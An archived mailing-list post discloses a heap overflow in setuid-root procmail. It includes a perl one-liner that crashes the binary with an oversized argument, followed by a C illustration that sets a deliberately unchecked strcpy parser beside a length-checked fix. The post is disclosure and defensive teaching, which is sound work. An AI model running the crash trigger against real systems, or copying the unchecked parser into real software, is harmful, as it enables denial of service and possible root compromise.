Vulnerability Development mailing list archives

procmail heap overflow


From: flatline <flatline () blackhat nl>
Date: Wed, 19 Jun 2002 02:38:08 +0200

hi,

I found a heap overflow in procmail (up until the latest version) some time ago.

flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$

At first it seemed to properly drop privs before segging, but not too long ago I managed to make it crash while it still had euid 0. Segfaults have been seen on Red Hat/Slackware Linux and BSD variants. Successful exploitation has not been verified.

/ flatline

greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
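The report above triggers the crash with a command-line assignment (a long run of `A`s followed by `=A`) that exceeds procmail's line buffer. As an added illustration, not code from procmail or from the poster, the C program below shows the defensive shape of such an argument parser: the length of an untrusted `NAME=VALUE` argument is checked against the buffer limit before anything is allocated or copied, so an oversize argument is rejected with an error instead of being written past the end of a heap block. `LINEBUF` is set to 2048 as an assumption (procmail's real value is not stated on the page), `parse_assignment_bounded`, `parse_assignment_unchecked` and `make_long_assignment` are names chosen here, and the default argument is constructed sample input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for procmail's LINEBUF (assumed value; the page does not give it). */
#define LINEBUF 2048

/* A parsed NAME=VALUE assignment; both pointers live in one heap block. */
struct assignment {
    char *name;
    char *value;
};

/* The unchecked pattern: a fixed-size heap buffer filled from an argument of
 * arbitrary length. With an argument longer than LINEBUF this writes past the
 * end of the block, which is the class of bug the report describes. Kept only
 * for contrast; nothing here calls it with untrusted input. */
int parse_assignment_unchecked(const char *arg, struct assignment *out)
{
    const char *eq = strchr(arg, '=');
    if (!eq)
        return -1;
    char *buf = malloc(LINEBUF);
    if (!buf)
        return -3;
    strcpy(buf, arg);                 /* no bound: heap overflow on long input */
    buf[eq - arg] = '\0';
    out->name = buf;
    out->value = buf + (eq - arg) + 1;
    return 0;
}

/* Hardened form: validate the length first, then allocate and copy.
 * Returns 0 on success, -1 if arg is not an assignment, -2 if it would not
 * fit in LINEBUF (including the terminating NUL), -3 on allocation failure.
 * In a setuid program this check must run before any privileged work, since
 * the report notes the crash occurring while euid was still 0. */
int parse_assignment_bounded(const char *arg, struct assignment *out)
{
    const char *eq = strchr(arg, '=');
    if (!eq)
        return -1;
    size_t len = strlen(arg);
    if (len + 1 > LINEBUF) {
        fprintf(stderr, "Exceeded LINEBUF\n");
        return -2;                    /* reject instead of overflowing */
    }
    char *buf = malloc(LINEBUF);
    if (!buf)
        return -3;
    memcpy(buf, arg, len + 1);        /* len + 1 <= LINEBUF, so this fits */
    buf[eq - arg] = '\0';             /* split NAME and VALUE in place */
    out->name = buf;
    out->value = buf + (eq - arg) + 1;
    return 0;
}

void free_assignment(struct assignment *a)
{
    free(a->name);
    a->name = a->value = NULL;
}

/* Build an argument of n 'A's followed by "=A", the shape used in the report
 * (constructed test input, so the parser can be exercised without a shell). */
char *make_long_assignment(size_t n)
{
    char *s = malloc(n + 3);
    if (!s)
        return NULL;
    memset(s, 'A', n);
    s[n] = '=';
    s[n + 1] = 'A';
    s[n + 2] = '\0';
    return s;
}

int main(int argc, char **argv)
{
    /* Constructed default so the program runs with no arguments. */
    const char *arg = argc > 1 ? argv[1] : "MAILDIR=/var/mail";
    struct assignment a;
    int rc = parse_assignment_bounded(arg, &a);
    if (rc == 0) {
        printf("name=%s value=%s\n", a.name, a.value);
        free_assignment(&a);
    } else {
        printf("rejected (%d)\n", rc);
    }
    return rc == 0 ? 0 : 1;
}
```

Running the program with a 10240-byte argument of the form shown in the report makes it print `Exceeded LINEBUF` and exit non-zero rather than crash, because the size check precedes the copy; the unchecked variant is where a missing check of that kind turns the same input into heap corruption.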
